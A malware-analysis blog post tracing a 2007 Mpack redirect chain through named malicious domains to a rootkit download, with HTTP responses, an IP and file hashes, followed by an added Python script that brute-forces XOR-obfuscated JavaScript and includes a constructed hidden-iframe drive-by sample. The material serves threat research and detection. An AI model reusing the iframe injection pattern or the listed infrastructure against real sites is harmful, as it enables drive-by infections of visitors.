
Exploits Serving Domains

More leads from the previous analysis of the Mpack kit embedded at dekalab.info, this time with an emphasis on one particular farm of malicious domains. Multiple redirectors, blackhat SEO, XOR-based JavaScript obfuscation and a rootkit at the end of the chain: pretty much everything is in place, as usual. The majority of the redirectors are part of an exploit-serving domains farm. The whole process starts from trancer.biz:

trancer.biz/sys/index.php
81.95.149.176
HTTP/1.1 302 Found
Server: nginx/0.5.17
Date: Tue, 26 Jun 2007 11:51:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Location: cawajanga.biz/ts/in.cgi?oscorp

HTTP/1.1 302 Found
Server: nginx/0.5.17
Date: Tue, 26 Jun 2007 11:51:31 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Location: blooded.biz/2103/index.php

Then we get redirected to the obfuscated payload at blooded.biz (81.95.149.176), loaded in between cawajanga.biz/ts/in.cgi?oscorp and mobi-info.ru. Deobfuscating the XOR-ed JavaScript leads us to the exact payload location; the binary served from it is detected as Rootkit.Win32.Agent.fb:

File size: 7503 bytes
MD5: 09994afd14b189697a039937f05f440f
SHA1: b9832689aa1272f39959087df41cea13fc283910
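The XOR-ed stage mentioned above is the kind of thing an analyst decodes by hand or with a small script. The following is an added example, not code from the original post or from any of the domains it lists: it takes a hex-encoded blob XOR-ed byte by byte with a single-byte key (the most common form of this obfuscation in such kits), brute-forces the key by scoring the decoded text for script-like tokens, and pulls the next-stage URL out of the result. The sample blob, the key 0x5A and the URL example.invalid are constructed for the demonstration and are not taken from the page; real stages may use other encodings (%xx escapes, charCode arrays) or multi-byte keys, which this script does not handle.

```python
"""Recover a single-byte-XOR-obfuscated JavaScript stage and pull the payload URL out of it."""
import re

# Constructed sample (not from the page): a hidden-iframe stage of the kind such farms serve,
# XOR-ed byte by byte with one key and stored as a hex string. Key, stage and URL are made up.
_SAMPLE_KEY = 0x5A
_SAMPLE_STAGE = (
    '<iframe src="http://example.invalid/2103/load.php?id=7" '
    'width="0" height="0" style="visibility:hidden"></iframe>'
)
SAMPLE_HEX = "".join(f"{ord(c) ^ _SAMPLE_KEY:02x}" for c in _SAMPLE_STAGE)

# Tokens an exploit-serving stage almost always contains once decoded; used to rank candidate keys.
_MARKERS = ("<iframe", "<script", "http://", "src=", "document.write", "eval(", "unescape(")
_URL_RE = re.compile(r'https?://[^\s"\'<>()]+')


def xor_decode(hex_blob: str, key: int) -> str:
    """XOR every byte of a hex-encoded blob with a single-byte key and return it as text."""
    data = bytes.fromhex(hex_blob)
    # latin-1 maps every byte value to a character, so wrong keys never raise here.
    return bytes(b ^ key for b in data).decode("latin-1")


def score(text: str) -> int:
    """Count marker tokens; a wrong key yields near-random text that scores about 0."""
    return sum(text.count(m) for m in _MARKERS)


def recover_key(hex_blob: str):
    """Try all 256 keys and return (key, decoded_text) for the best-scoring candidate,
    or (None, None) if no key produces anything script-like."""
    best_key, best_text, best_score = None, None, 0
    for key in range(256):
        text = xor_decode(hex_blob, key)
        s = score(text)
        if s > best_score:
            best_key, best_text, best_score = key, text, s
    return best_key, best_text


def extract_urls(text: str) -> list:
    """Pull http(s) URLs (next-stage / payload locations) out of decoded script text."""
    return _URL_RE.findall(text)


if __name__ == "__main__":
    key, decoded = recover_key(SAMPLE_HEX)
    print(f"key=0x{key:02x}")
    print(decoded)
    print("payload locations:", extract_urls(decoded))
```

Feed it the hex string lifted from the obfuscated page source instead of SAMPLE_HEX; if no key scores, the stage is not single-byte XOR and the decoding loop in the page's own JavaScript has to be read to find the actual transform.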
Copyright © 2011. Dancho Danchev's Blog - Mind Streams of Information Security Knowledge . All Rights Reserved